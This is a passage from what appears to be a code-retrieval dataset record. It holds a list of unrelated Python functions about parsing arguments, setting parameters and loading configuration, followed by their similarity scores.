Load configuration\n # parameters from the manifest command.\n self.load_manifest_config(repository, revision)\n\n buildroot = self.m.path['root'].join('cbuild', self.c.cbb.builddir)\n cbb_args = [\n '--buildroot', buildroot,\n ]\n if not args:\n cbb_args.append('--buildbot')\n if self.c.chromite_branch and not self.c.cbb.disable_bootstrap:\n cbb_args.extend(['--branch', self.c.chromite_branch])\n if self.c.cbb.build_number is not None:\n cbb_args.extend(['--buildnumber', self.c.cbb.build_number])\n if self.c.cbb.chrome_rev:\n cbb_args.extend(['--chrome_rev', self.c.cbb.chrome_rev])\n if self.c.cbb.debug:\n cbb_args.extend(['--debug'])\n if self.c.cbb.clobber:\n cbb_args.extend(['--clobber'])\n if self.c.cbb.chrome_version:\n cbb_args.extend(['--chrome_version', self.c.cbb.chrome_version])\n if self.c.cbb.config_repo:\n cbb_args.extend(['--config_repo', self.c.cbb.config_repo])\n if self.c.repo_cache_dir and self.c.cbb.supports_repo_cache:\n cbb_args.extend(['--repo-cache', self.c.repo_cache_dir])\n\n # Set the build ID, if specified.\n if self.c.cbb.build_id:\n cbb_args.extend(['--master-build-id', self.c.cbb.build_id])\n\n # Add custom args, if there are any.\n cbb_args.extend(args)\n\n # Run cbuildbot.\n return self.cbuildbot(str('cbuildbot [%s]' % (self.c.cbb.config,)),\n self.c.cbb.config,\n args=cbb_args,\n cwd=self.m.path['slave_build'])", "def _SetRunParameters(self, params: Mapping[str, Any]) -> None:\n # Ideally YCSB should be refactored to include a function that just takes\n # commands for a run, but that will be a large refactor.\n FLAGS['ycsb_run_parameters'].unparse()\n FLAGS['ycsb_run_parameters'].parse([f'{k}={v}' for k, v in params.items()])", "def definearguments(self, customparser):\n\n customparser.add_option(\n '--disable',\n action=\"store_false\",\n dest=\"enableFeature\",\n help=\"Disable the Scalable Persistent Memory feature. 
Warning: \"\\\n \"any pending configuration changes will be lost.\"\n )", "def set_parameters(self,params):\n K3Supervisor.set_parameters(self,params)\n self.blending.set_parameters(self.parameters)", "def configure(self, *args):\n raise NotImplementedError(self, \"configure\")", "def _ApplyFlags(cls, config_values, flag_values):\n super(ContainerRegistrySpec, cls)._ApplyFlags(config_values, flag_values)\n if flag_values['cloud'].present or 'cloud' not in config_values:\n config_values['cloud'] = flag_values.cloud\n if flag_values['container_cluster_cloud'].present:\n config_values['cloud'] = flag_values.container_cluster_cloud\n updated_spec = {}\n if flag_values['project'].present:\n updated_spec['project'] = flag_values.project\n if flag_values['zone'].present:\n updated_spec['zone'] = flag_values.zone[0]\n cloud = config_values['cloud']\n cloud_spec = config_values.get('spec', {}).get(cloud, {})\n cloud_spec.update(updated_spec)\n config_values['spec'] = {cloud: cloud_spec}", "def paraChck(**kwargs):\n import sys\n\n \n def_val = {\n 'x_train':None,\n 'y_train':None,\n 'x_test':None,\n 'y_test':None,\n 'channel':1,\n 'input_img_cols':72,\n 'input_img_rows':72,\n 'nb_classes':13,\n 'nb_epoch': 5,\n 'batch_size' : 16,\n 'dict_label' : None} # default parameteters value\n\n diff = set(kwargs.keys()) - set(def_val.keys())\n if diff:\n print(\"Invalid args:\",tuple(diff),file=sys.stderr)\n return\n\n def_val.update(kwargs)\n return def_val", "def commit_settings(self, param):\n try:\n if param.name() == 'kinesis_lib':\n try:\n sys.path.append(param.value())\n clr.AddReference(\"Thorlabs.MotionControl.DeviceManagerCLI\")\n clr.AddReference(\"Thorlabs.MotionControl.IntegratedStepperMotorsCLI\")\n clr.AddReference(\"Thorlabs.MotionControl.GenericMotorCLI\")\n import Thorlabs.MotionControl.IntegratedStepperMotorsCLI as Integrated\n import Thorlabs.MotionControl.DeviceManagerCLI as Device\n import Thorlabs.MotionControl.GenericMotorCLI as Generic\n Device.DeviceManagerCLI.BuildDeviceList()\n serialnumbers = [str(ser) for ser in\n Device.DeviceManagerCLI.GetDeviceList(Integrated.CageRotator.DevicePrefix)]\n\n except:\n serialnumbers = []\n self.settings.child(('serial_number')).setOpts(limits=serialnumbers)\n\n elif param.name() == 'polling_time':\n self.controller.StopPolling()\n QThread.msleep(500)\n self.controller.StartPolling(self.settings.child(('polling_time')).value())\n QThread.msleep(500)\n self.emit_status(ThreadCommand('update_main_settings', [['wait_time'], param.value(), 'value']))\n\n\n except Exception as e:\n self.emit_status(ThreadCommand('Update_Status', [getLineInfo() + str(e), 'log']))", "def set_distr_options(args):\n global distr_options\n distr_options = {}\n\n distr_options['error_distribution_domain'] = error_distribution_domain\n distr_options['seg_N'] = seg_N\n distr_options['seg_kappa'] = seg_kappa\n distr_options['nonlinear_solver'] = nonlinear_solver\n distr_options['non_negativity_constraint_distributions'] = \\\n non_negativity_constraint_distributions\n distr_options['probability_constraint_of_distributions'] = \\\n probability_constraint_of_distributions", "def set_attributes(self, argv):\n if argv[0] == \"population\" or argv[0] == \"pop\":\n if argv[1] == \"ttl\":\n self.population[int(argv[2])].ttl = int(argv[3])", "def main(arguments=None):\n ########## IMPORTS ##########\n ## STANDARD LIB ##\n ## THIRD PARTY ##\n ## LOCAL APPLICATION ##\n import dryxPython.commonutils as dcu\n\n ## ACTIONS BASED ON WHICH ARGUMENTS ARE RECIEVED ##\n # PRINT COMMAND-LINE 
USAGE IF NO ARGUMENTS PASSED\n if arguments == None:\n arguments = docopt(__doc__)\n\n # UNPACK SETTINGS\n if \"--settingsFile\" in arguments and arguments[\"--settingsFile\"]:\n import yaml\n stream = file(arguments[\"--settingsFile\"], 'r')\n settings = yaml.load(stream)\n stream.close()\n # SETUP LOGGER -- DEFAULT TO CONSOLE LOGGER IF NONE PROVIDED IN SETTINGS\n if 'settings' in locals() and \"logging settings\" in settings:\n log = dl.setup_dryx_logging(\n yaml_file=arguments[\"--settingsFile\"]\n )\n elif \"--logger\" not in arguments or arguments[\"--logger\"] is None:\n log = dl.console_logger(\n level=\"DEBUG\"\n )\n log.debug('logger setup')\n\n # unpack remaining cl arguments using `exec` to setup the variable names\n # automatically\n for arg, val in arguments.iteritems():\n varname = arg.replace(\"--\", \"\")\n if isinstance(val, str) or isinstance(val, unicode):\n exec(varname + \" = '%s'\" % (val,))\n else:\n exec(varname + \" = %s\" % (val,))\n if arg == \"--dbConn\":\n dbConn = val\n log.debug('%s = %s' % (varname, val,))\n\n ## START LOGGING ##\n startTime = dcu.get_now_sql_datetime()\n log.info(\n '--- STARTING TO RUN THE git_update_script.py AT %s' %\n (startTime,))\n\n # call the worker function\n # x-if-settings-or-database-credientials\n if \"git repos\" in settings:\n for repo in settings[\"git repos\"]:\n log.debug('repo[\"path\"]: %s' % (repo[\"path\"],))\n log.debug('repo[\"branchToUpdate\"]: %s' % (repo[\"branchToUpdate\"],))\n update_git_repos(\n log=log,\n gitProjectRoot=repo[\"path\"],\n branchToUpdate=repo[\"branchToUpdate\"]\n )\n\n ## FINISH LOGGING ##\n endTime = dcu.get_now_sql_datetime()\n runningTime = dcu.calculate_time_difference(startTime, endTime)\n log.info(\n '-- FINISHED ATTEMPT TO RUN THE git_update_script.py AT %s (RUNTIME: %s) --' %\n (endTime, runningTime, ))\n\n return", "def process_args(args, multiple_chrs=False, tool_name=\"\"):\r\n # Retrieves the dataset.\r\n dataset, chrom, tool = None, None, None\r\n\r\n dataset = DATASETS.get(args.dataset, None)\r\n if not dataset:\r\n print \"Unknown dataset %s.\" % args.dataset\r\n return dataset, chrom, tool\r\n dataset.set_work_dir(args.path)\r\n\r\n # Retreieves the Chromosome(s).\r\n if multiple_chrs:\r\n chrom = [dataset.get_chr(chr_num) for chr_num in args.chrs]\r\n else:\r\n chrom = dataset.get_chr(args.chr)\r\n\r\n # Retrieves the tool.\r\n if tool_name:\r\n full_name = get_tool(tool_name)\r\n if not full_name:\r\n return dataset, chrom, tool\r\n tool = TOOLS[full_name]\r\n tool.set_work_dir(args.path)\r\n\r\n return dataset, chrom, tool", "def bcp_set(self, **kwargs):\n pass", "def _handle_arguments(self, args):\n super()._handle_arguments(args)\n\n # The device display serial\n self.display_device_serial = self.config.get(\n 'DisplayDevice', 'DisplayDeviceSerialUSBName', fallback=None\n )\n\n # Read Analytics Tracking ID\n self.analytics_tracking_id = self.config.get(\n 'Analytics', 'tracking_id', fallback=None\n )", "def _set_version(args: Any):\n if args['msc']:\n version = 'msc'\n elif args['nx']:\n version = 'nx'\n elif args['optistruct']:\n version = 'optistruct'\n elif args['nasa95']:\n version = 'nasa95'\n elif args['mystran']:\n version = 'mystran'\n else:\n version = None\n args['version'] = version\n del args['msc'], args['nx'], args['nasa95'], args['mystran'], args['optistruct']", "def modify_args(args):\n \n if args['voxel_path'] is None:\n args['voxel_path'] = args['stitched_prefix'] + \"0.mrc\"\n mrc = mrcfile.open(args['voxel_path'])\n args['voxel_size'] = 
float(mrc.voxel_size.x) # Angstrom / pixel\n mrc.close()\n\n args['params'] = pickle.load(open(args['params'], \"rb\"))\n\n if args['exclude_angles'] is None:\n args['exclude_angles'] = np.array(list())\n\n return args", "def cmd_cdup(args):", "def update_args(self, args):\n for cfg in args:\n keys, v = cfg.split(\"=\", maxsplit=1)\n keylist = keys.split(\".\")\n dic = self\n # print(keylist)\n if len(keylist) == 1:\n assert keylist[0] in dir(dic), \"Unknown config key: {}\".format(\n keylist[0]\n )\n for i, k in enumerate(keylist[:-1]):\n assert k in dir(dic), \"Unknown config key: {}\".format(k)\n dic = getattr(dic, k)\n key = keylist[-1]\n assert key in dir(dic), \"Unknown config key: {}\".format(key)\n oldv = getattr(dic, key)\n if not isinstance(oldv, str):\n v = eval(v)\n setattr(dic, key, v)", "def configure(args):\n print('Configures HPC fleet with given name \"{}\"'.format(args))", "def set_params(self, params):", "def update_args(self, args):\n for cfg in args:\n keys, v = cfg.split('=', maxsplit=1)\n keylist = keys.split('.')\n dic = self\n for i, k in enumerate(keylist[:-1]):\n assert k in dir(dic), \"Unknown config key: {}\".format(keys)\n dic = getattr(dic, k)\n key = keylist[-1]\n oldv = getattr(dic, key)\n if not isinstance(oldv, str):\n v = eval(v)\n setattr(dic, key, v)", "def set_params(self, **kwargs):\n\n kw_keys = list(kwargs)\n\n if 'alpha' in kw_keys:\n self.alpha = kwargs['alpha']\n\n if 'beta' in kw_keys:\n self.beta = kwargs['beta']\n\n if 'gamma' in kw_keys: \n \tself.gamma = kwargs['gamma']\n\n if 'epsilon' in kw_keys:\n self.epsilon = kwargs['epsilon']\n \n self.nact = self.highbound-self.lowbound\n self.actions = np.arange(self.nact)", "def _set_credentials(args):\n if hasattr(args, 'username') and hasattr(args, 'apikey') \\\n and args.username and args.apikey:\n config.update({'username': args.username})\n config.update({'apikey': args.apikey})\n elif os.path.exists(os.path.expanduser('~/.jarvice.cfg')):\n CParser = configparser.ConfigParser()\n CParser.read([os.path.expanduser('~/.jarvice.cfg'), ])\n config.update({'username': CParser.get('auth', 'username')})\n config.update({'apikey': CParser.get('auth', 'apikey')})\n else:\n sys.stderr.write(\"username and apikey must be passed as arguments \" \n \"or set in ~/.jarvice.cfg\")\n sys.exit(1)", "def configAll(self,set,*args,**kwargs):\n # update first the params dictionary with any parameters passed to the function \n self.updateParameters(*args,**kwargs)\n # create ctypes objects for all the python typed parameters in the the dictionary params, to be passed to the C DLL.\n clock = c_int32(self._params[\"clock\"])\n trig = c_int32(self._params[\"trigSource\"])\n trig_coupling = c_int32(self._params[\"trigCoupling\"])\n trig_slope = c_int32(self._params[\"trigSlope\"])\n trig_level1 = c_double(self._params[\"trigLevel1\"])\n trig_level2 = c_double(self._params[\"trigLevel2\"])\n trig_delay = c_double(self._params[\"trigDelay\"])\n mem = c_int32(int(self._params[\"memType\"]))\n configMode=c_int32(int(self._params[\"configMode\"]))\n converters_per_channel=c_int32(self._params[\"convertersPerChannel\"])\n used_channels = c_int32(self._params[\"usedChannels\"])\n sample_interval = c_double(self._params[\"sampleInterval\"])\n number_of_points = c_int32(self._params[\"numberOfPoints\"])\n number_of_segments = c_int32(self._params[\"numberOfSegments\"])\n numberOfBanks = c_int32(self._params[\"numberOfBanks\"])\n fs=zeros(self.nbrOfChannels,dtype=float64)\n of=zeros(self.nbrOfChannels,dtype=float64)\n 
cs=zeros(self.nbrOfChannels,dtype=int32)\n bs=zeros(self.nbrOfChannels,dtype=int32)\n for i in range(0,self.nbrOfChannels):\n fs[i]=self._params[\"fullScales\"][i]\n of[i]=self._params[\"offsets\"][i]\n cs[i]=self._params[\"couplings\"][i]\n bs[i]=self._params[\"bandwidths\"][i] \n time_us=myType(0,float64) \n dataArraySize=c_int32(0)\n timeArraySize=c_int32(0)\n # call the ConfigAll DLL function that configures all the acquisition parameters\n status = self.__acqiris_QuantroDLL1.ConfigAll(\n c_bool(set)\n ,self.__instrumentID\n ,byref(clock)\n ,byref(used_channels)\n ,byref(converters_per_channel)\n ,byref(mem)\n ,byref(sample_interval)\n ,byref(number_of_points)\n ,byref(number_of_segments)\n ,byref(numberOfBanks)\n ,byref(trig)\n ,byref(trig_coupling)\n ,byref(trig_slope)\n ,byref(trig_level1)\n ,byref(trig_level2)\n ,byref(trig_delay)\n ,byref(configMode)\n ,byref(dataArraySize)\n ,byref(timeArraySize)\n ,fs.ctypes.data \n ,of.ctypes.data \n ,cs.ctypes.data \n ,bs.ctypes.data\n ,time_us.address()\n ,c_bool(True)\n ) \n self.transformErr2Str(status)\n # update dictionary params by converting back ctyped data in python\n # because params dictionary has to be kept always up to date \n self._params[\"clock\"]=clock.value\n self._params[\"trigSource\"]=trig.value\n self._params[\"trigCoupling\"]=trig_coupling.value\n self._params[\"trigSlope\"]=trig_slope.value\n self._params[\"trigLevel1\"]=trig_level1.value\n self._params[\"trigLevel2\"]=trig_level2.value\n self._params[\"trigDelay\"]= trig_delay.value\n self._params[\"memType\"]=mem.value\n self._params[\"configMode\"]=configMode.value\n self._params[\"convertersPerChannel\"]=converters_per_channel.value\n self._params[\"usedChannels\"]=used_channels.value\n self._params[\"sampleInterval\"]=sample_interval.value\n self._params[\"numberOfPoints\"]=number_of_points.value\n self._params[\"numberOfSegments\"]=number_of_segments.value\n self._params[\"numberOfBanks\"]=numberOfBanks.value\n for i in range(0,self.nbrOfChannels):\n self._params[\"fullScales\"][i]=float(fs[i])\n self._params[\"offsets\"][i]=float(of[i])\n self._params[\"couplings\"][i]=int(cs[i])\n self._params[\"bandwidths\"][i]=int(bs[i])\n self.dataArraySize=dataArraySize.value # This is the data array size required for a raw data transfer\n self.timeArraySize=timeArraySize.value # This is the time array size required for timestamps and horPositions\n # self.notify(\"parameters\",self._params) # possible notification to a Frontpanel \n return status", "def __init__(self, *args, **kwargs):\n _gdi_.DCPenChanger_swiginit(self,_gdi_.new_DCPenChanger(*args, **kwargs))", "def setEnableCondition(*args):" ]
[ "0.7167858", "0.60452235", "0.60324895", "0.5878222", "0.57493514", "0.5714063", "0.56342685", "0.56257355", "0.5574821", "0.5573054", "0.55587506", "0.55421853", "0.55330527", "0.55330527", "0.55330527", "0.55330527", "0.55330527", "0.55182", "0.5511414", "0.55045736", "0.5467105", "0.54632825", "0.54624164", "0.5453541", "0.5450035", "0.54375243", "0.5430262", "0.5427062", "0.5421712", "0.5416249", "0.5409233", "0.53626144", "0.5356093", "0.53518593", "0.5341914", "0.53287685", "0.53205323", "0.5306304", "0.5291827", "0.5266918", "0.52517205", "0.52418184", "0.5241179", "0.5233229", "0.52232593", "0.522301", "0.5212935", "0.521246", "0.5211139", "0.5198409", "0.51920295", "0.5191129", "0.5184949", "0.5163929", "0.51605237", "0.51605237", "0.51605237", "0.51605237", "0.51605237", "0.5156189", "0.5156053", "0.51532376", "0.51515496", "0.5148168", "0.5147214", "0.51384366", "0.5131453", "0.51312524", "0.512232", "0.51180476", "0.5117403", "0.5112216", "0.5111987", "0.51078975", "0.5097551", "0.50892955", "0.508914", "0.50842303", "0.50772274", "0.50757766", "0.5070307", "0.5069131", "0.5065604", "0.5060312", "0.505138", "0.504097", "0.50384307", "0.5030067", "0.5027108", "0.50217646", "0.50185156", "0.5017288", "0.5011161", "0.5010678", "0.5000946", "0.49964997", "0.4992266", "0.49915817", "0.4988403", "0.4983168" ]
0.528423
39
Determines what to do with the incoming data, whether it is sending an exposure command or setting a parameter. This is a separate method from handle_client() because it is called as a new thread, so ensure the exposure is nonblocking.
def handle_command(log, writer, data):
    response = 'BAD: Invalid Command'
    commandList = data.split()
    try:
        if commandList[0] == 'expose':
            if len(commandList) == 3:
                if commandList[1] == 'light' or commandList[1] == 'dark' or commandList[1] == 'flat':
                    expType = commandList[1]
                    expTime = commandList[2]
                    try:
                        float(expTime)
                        if float(expTime) > 0:
                            expTime = float(expTime)
                            fileName = exposure(expType, expTime)
                            response = 'OK\n'+'FILENAME = '+fileName
                        else:
                            response = 'BAD: Invalid Exposure Time'
                    except ValueError:
                        response = 'BAD: Invalid Exposure Time'
            elif len(commandList) == 2:
                if commandList[1] == 'bias':
                    expType = commandList[1]
                    try:
                        fileName = exposure(expType, 0.0)
                        response = 'OK\n'+'FILENAME: '+fileName
                    except ValueError:
                        response = 'BAD: Invalid Exposure Time'
        elif commandList[0] == 'set':
            if len(commandList) >= 1:
                response = setParams(commandList[1:])
    except IndexError:
        response = 'BAD: Invalid Command'
    # tell the client the result of their command & log it
    #log.info('RESPONSE = '+response)
    #writer.write((response+'\n---------------------------------------------------\n').encode('utf-8'))
    writer.write((response+'\nDONE\n').encode('utf-8'))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def command(self):\n saw_error = False\n try:\n analog_gain = float(self.value_analog.get())\n except:\n print(\"analog must be floating point value\")\n self.value_analog.set(str(self.tcp_comms.tcp_params.analog_gain_target))\n saw_error = True\n try:\n digital_gain = float(self.value_digital.get())\n except:\n print(\"digital must be floating point value\")\n self.value_digital.set(str(self.tcp_comms.tcp_params.digital_gain_target))\n saw_error = True\n try:\n analog_tol = float(self.value_analog_tol.get())\n except:\n print(\"analog tol must be floating point value\")\n self.value_analog_tol.set(str(self.tcp_comms.tcp_params.analog_gain_tol))\n saw_error = True\n try:\n digital_tol = float(self.value_digital_tol.get())\n except:\n print(\"digital tol must be floating point value\")\n self.value_digital_tol.set(str(self.tcp_comms.tcp_params.digital_gain_tol))\n saw_error = True\n if not saw_error:\n self.tcp_comms.tcp_params.analog_gain_target = analog_gain\n self.tcp_comms.tcp_params.digital_gain_target = digital_gain\n self.tcp_comms.tcp_params.analog_gain_tol = analog_tol\n self.tcp_comms.tcp_params.digital_gain_tol = digital_tol\n self.tcp_comms.send_freeze_exposure(analog_gain, analog_tol, digital_gain, digital_tol)", "async def handle_client(reader, writer):\n\n request = None\n \n # loop to continually handle incoming data\n while request != 'quit': \n request = (await reader.read(255)).decode('utf8')\n print(request.encode('utf8'))\n #log.info('COMMAND = '+request)\n writer.write(('COMMAND = '+request.upper()+'\\n').encode('utf8')) \n\n response = 'BAD'\n # check if data is empty, a status query, or potential command\n dataDec = request\n if dataDec == '':\n break\n elif 'status' in dataDec.lower():\n response = 'OK'\n # check if the command thread is running\n try:\n if exposureState() > 0:\n response = response + '\\nBUSY'\n else:\n response = response + '\\nIDLE'\n except:\n response = response + '\\nIDLE'\n\n if ccd_frame[0].s == PyIndi.ISS_ON:\n frameType = 'LIGHT'\n elif ccd_frame[1].s == PyIndi.ISS_ON:\n frameType = 'BIAS'\n elif ccd_frame[2].s == PyIndi.ISS_ON:\n frameType = 'DARK'\n elif ccd_frame[3].s == PyIndi.ISS_ON:\n frameType = 'FLAT'\n\n response = response+\\\n '\\nBIN MODE = '+str(ccd_bin[0].value)+'x'+str(ccd_bin[1].value)+\\\n '\\nCCD TEMP = '+str(ccd_temp[0].value)+\\\n 'C\\nLAST FRAME TYPE = '+str(frameType)+\\\n '\\nFILE DIR = '+str(fileDir)+\\\n '\\nLAST IMAGE = '+str(imgName)\n\n # send current status to open connection & log it\n #log.info('RESPONSE: '+response)\n writer.write((response+'\\nDONE\\n').encode('utf-8'))\n \n elif 'stop' in dataDec.lower():\n # check if the command thread is running\n try:\n if comThread.is_alive():\n response = 'OK: aborting exposure'\n ccd_abort[0].s=PyIndi.ISS_ON \n indiclient.sendNewSwitch(ccd_abort)\n blobEvent.set() #Ends the currently running thread.\n response = response+'\\nExposure Aborted'\n else:\n response = 'OK: idle'\n except:\n response = 'OK: idle'\n\n # send current status to open connection & log it\n #log.info('RESPONSE = '+response)\n writer.write((response+'\\nDONE\\n').encode('utf-8'))\n\n else:\n # check if the command thread is running, may fail if not created yet, hence try/except\n try:\n if comThread.is_alive():\n response = 'BAD: busy'\n # send current status to open connection & log it\n #log.info('RESPONSE = '+response)\n writer.write((response+'\\nDONE\\n').encode('utf-8'))\n else:\n # create a new thread for the command\n comThread = threading.Thread(target=handle_command, args=(log, 
writer, dataDec,))\n comThread.start()\n except:\n # create a new thread for the command\n comThread = threading.Thread(target=handle_command, args=(log, writer, dataDec,))\n comThread.start()\n\n await writer.drain()\n writer.close()", "def got_data(self, data):\n if self.get_current_state() == SBE37ProtocolState.DIRECT_ACCESS:\n # direct access mode\n if len(data) > 0:\n mi_logger.debug(\"SBE37Protocol._got_data(): <\" + data + \">\") \n if self._driver_event:\n self._driver_event(DriverAsyncEvent.DIRECT_ACCESS, data)\n # TODO: what about logging this as an event?\n return\n \n if len(data)>0:\n # Call the superclass to update line and prompt buffers.\n CommandResponseInstrumentProtocol.got_data(self, data)\n \n # If in streaming mode, process the buffer for samples to publish.\n cur_state = self.get_current_state()\n if cur_state == SBE37ProtocolState.AUTOSAMPLE:\n if SBE37_NEWLINE in self._linebuf:\n lines = self._linebuf.split(SBE37_NEWLINE)\n self._linebuf = lines[-1]\n for line in lines:\n self._extract_sample(line)", "def _pve_control_cb(self, msg):\n self._data_available = True\n self._cmd = msg.data", "def _on_stdin_read(self, data):\n if not self.opts[\"udp\"]:\n self.fire(write(data))\n else:\n self.fire(write((self.host, self.port), data))", "def handleRecvData(self, data):\n\n\t\t#Look for commands\n\t\tif data == 'Hello':\n\t\t\t#Inform client it is 'connected'\n\t\t\tself.transmit(\"Welcome\")\n\n\t\telif data == 'kill':\t\n\t\t\t#Stop the server running\n\t\t\tself.running = False\n\n\t\telif data == 'control':\n\t\t\t#Print out if in control of car\n\t\t\tprint(\"Control query\")\n\t\t\tif self.arduino:\n\t\t\t\t#print(self.address)\n\t\t\t\tself.transmit(\"Control: True\")\n\t\t\telse:\n\t\t\t\t#print(self.address)\n\t\t\t\tself.transmit(\"Control: False\")\n\n\t\telif data == 'Hello?':\n\t\t\t#The client is still alive therefore set missing count to 0\n\t\t\tself.missingCount = 0\n\n\t\t#Look for Arduino Data\n\t\telif self.arduino:\n\t\t\t#Check if controlling the car and it's a valid car command\n\t\t\tif self.arduino.readPack(data): \n\t\t\t\tprint(self.address)\n\t\t\t\tprint(\"Sent to arduino: %s\" % data)\n\t\t\telse:\n\t\t\t\t#Print out other data\n\t\t\t\tprint(\"Not valid Arduino data\")\n\t\t\t\tprint(self.address)\n\t\t\t\tprint(data)\n\n\t\telse:\n\t\t\t#All other data print out\n\t\t\tprint(self.address)\n\t\t\tprint(data)", "def _handleIncomingDataAnalysis(self, msg: str):\n\t\tlogging.info(\"[CDA_CALLBACK]----->>>The _handleIncomingDataAnalysis method is being called\")\n\t\tad = DataUtil.jsonToActuatorData(self, msg)\n\t\tself.actuatorAdapterManager.sendActuatorCommand(ad)", "def _send_device_command(self, requested_state, requested_data):\n if requested_state:\n if requested_data is not None:\n self._brightness = int(requested_data)\n\n self._tellcore_device.dim(self._brightness)\n else:\n self._tellcore_device.turn_off()", "def data_received(self, data):\n # This may seem strange; feeding all bytes received to the **writer**,\n # and, only if they test positive, duplicating to the **reader**.\n #\n # The writer receives a copy of all raw bytes because, as an IAC\n # interpreter, it may likely **write** a responding reply.\n self._last_received = datetime.datetime.now()\n\n cmd_received = False\n for byte in data:\n try:\n recv_inband = self.writer.feed_byte(bytes([byte]))\n except:\n self._log_exception(logger.warning, *sys.exc_info())\n else:\n if recv_inband:\n # forward to reader (shell).\n self.reader.feed_data(bytes([byte]))\n\n # becomes True if 
any out of band data is received.\n cmd_received = cmd_received or not recv_inband\n\n # until negotiation is complete, re-check negotiation aggressively\n # upon receipt of any command byte.\n if not self._waiter_connected.done() and cmd_received:\n self._check_negotiation_timer()", "def communicate():\n pass", "def _async_process_data(self):\n _LOGGER.debug(\"Update switch called\")\n\n data = self._api.get_device_data(self._dev_id)\n\n if not data:\n _LOGGER.error(\"Received no data for device %s\", self._name)\n self.async_write_ha_state()\n return\n\n if \"relay\" in data:\n self._is_on = data[\"relay\"]\n\n self.async_write_ha_state()", "def _jsonCmdCallback(self, data):\n self.serverSemaphore.acquire()\n\n logging.debug(\"MenuMain: req = {}\".format(data))\n\n #check mandatory fields for each JSON request\n method = None\n jsonId = None\n params = None\n\n\n for attribute in data:\n if attribute == \"method\":\n method = data['method']\n elif attribute == \"id\":\n jsonId = data['id']\n elif attribute == \"params\":\n params = data['params']\n\n logging.debug(\"MenuMain: method = {} | id = {} | params = {}\".format(method, jsonId, params))\n\n if jsonId is None or method is None:\n logging.debug(\"MenuMain: jsonId or Method not defined in request\")\n msg = \"id and/or method not defined in request\"\n resp = _jsonErrResponse(jsonId, -1, msg)\n method = \"None\" # make sure no execution happens in the next steps\n\n if method in jsonHandler:\n resp = jsonHandler[method](jsonId, params)\n\n elif \"Input.\" in method:\n tmp = method.split('.')\n if len(tmp) == 2:\n resp = jsonHandler[\"Input\"](jsonId, tmp[1])\n else:\n msg = \"Input function not defined properly\"\n resp = _jsonErrResponse(jsonId, ERR_VALUE, msg)\n elif method == \"IshaPi.SetProperty\":\n if 'value' in data:\n resp = jsonHandler['IshaPi.ScreenSaver'](jsonId, data['value'])\n else:\n msg = \"IshaPi Property has no value....\"\n resp = _jsonErrResponse(jsonId, ERR_VALUE, msg)\n\n else:\n logging.debug(\"MenuMain: json handler not found\")\n msg = \"method not found....\"\n resp = _jsonErrResponse(jsonId, ERR_METHOD_NOT_FOUND, msg)\n\n self.serverSemaphore.release()\n return resp", "def _async_process_data(self):\n data = self._api.get_device_data(self._dev_id)\n\n if not data:\n _LOGGER.error(\"Received no data for device %s\", self._name)\n self.async_write_ha_state()\n return\n\n if \"relay\" in data:\n self._is_on = data[\"relay\"]\n\n self.async_write_ha_state()", "def handle_data(self, data_type, data_size, socket, data):\n return self.game.process_exnternal_request(socket, data_type, data_size, data)", "def data_received(self, transport, line):\n\n if transport not in self.clients:\n return\n\n client = self.clients[transport]\n log.debug(f'{client} << {line!r}')\n\n try:\n func_name, *args = line.split()\n except ValueError:\n return\n func = getattr(IncomingCommand, func_name, None)\n\n # Dispatch and handle errors\n try:\n if func is None:\n raise UnknownCommand(func_name)\n if not client.ident.registered and func_name not in self.allowed_unregistered_cmds:\n raise UnregisteredDisallow()\n func(client, *args)\n\n except UnknownCommand as e:\n log.info(f'{client} *** Unknown command {e} ***')\n client.send_as_server(ERR_UNKNOWNCOMMAND, f'{client.ident.nick} {e} :Unknown command')\n\n except TypeError as e:\n # A TypeError calling func() means the arguments were incorrect\n if str(e).startswith(func_name + '()'):\n client.send_as_server(ERR_NEEDSMOREPARAMS, f'{client.ident.nick} {func_name} :{e}')\n # Or it 
could be an exception from the function execution itself\n else:\n raise\n\n except UnregisteredDisallow as e:\n client.send_as_server(ERR_NOTREGISTERED, f'* :You have not registered')", "def handle_io_event(self, data):\n getattr(\n self,\n 'control_{}'.format(self.model)\n )(data['action'])\n self.update_serverside_status({\n 'action': data['action'], 'event_id': data['event_id']\n })", "def command(self, value):\n for ii in range(0, len(exposure_mode_names)):\n if value == exposure_mode_names[ii]: break\n self.tcp_comms.tcp_params.exposureMode = ii\n self.tcp_comms.send_exposure_mode(self.tcp_comms.tcp_params.exposureMode)", "def dataReceived(self, data):", "def handle(self):\r\n # self.request is the TCP socket connected to the client\r\n # read the incoming command\r\n request = self.request.recv(1024).strip()\r\n # write to the queue waiting to be processed by the server\r\n INPUT_QUEUE.put(request)\r\n # wait for the server answer in the output queue\r\n response = OUTPUT_QUEUE.get(timeout=5.0)\r\n # send back the answer\r\n self.request.send(response)", "def receive(self, sender, sessionID, data):\n if data[0] == \"PULL\" or data[0] == \"PUSH\" or data[0] == \"PUSH2\":\n self.sessions[sessionID].ongoingRequest = data\n self.serviceRequests()\n\n elif data[0] == \"DATA\":\n self.incomingBuffer[data[1]] = data[2]\n self.integrate()", "async def process_data(self, received):\n\t\treceived_json = utilities.is_json(received)\n\n\t\tif not received_json:\n\t\t\traise exceptions.ClientError('INVALID_JSON')\n\n\t\taction = received_json.get('c').upper()\n\t\tdata = received_json.get('d')\n\n\t\tlog.info('%s: %s' % (\n\t\t\tself.session,\n\t\t\taction\n\t\t))\n\n\t\tif not data and action not in constants.DATALESS:\n\t\t\traise exceptions.ClientError('NO_DATA')\n\n\t\tif action == 'JOIN_GROUP':\n\t\t\tawait self.join(data.get('group'))\n\t\telif action == 'LEAVE_GROUP':\n\t\t\tawait self.leave()\n\t\telif action == 'EDIT_USER':\n\t\t\tawait self.edit(name=data.get('name'))\n\t\telif action == 'EDIT_GAME':\n\t\t\tif self.group != None:\n\t\t\t\tself.group.game.edit(\n\t\t\t\t\tround_count=data.get('round_count'),\n\t\t\t\t\twordlist=data.get('wordlist')\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\traise exceptions.ClientError('NO_GROUP')\n\t\telif action == 'GAME_START':\n\t\t\tawait self.group.start_game()\n\t\telif action == 'CHAT_MESSAGE':\n\t\t\tawait self.message(data.get('message'))\n\t\telif action == 'CLOSE_CONNECTION':\n\t\t\tself.active = 0", "def __call__(self,data):\n\n log.debug('got data: %s' % (len(data)))\n\n # if we don't have args yet, these must be them\n if not self.args:\n self.parse_args(data)\n\n else:\n # we've already got args, must\n # be a message\n self.handle_send(data)", "def _receive(self, what, address, **kwargs):\n\n print('_receive: 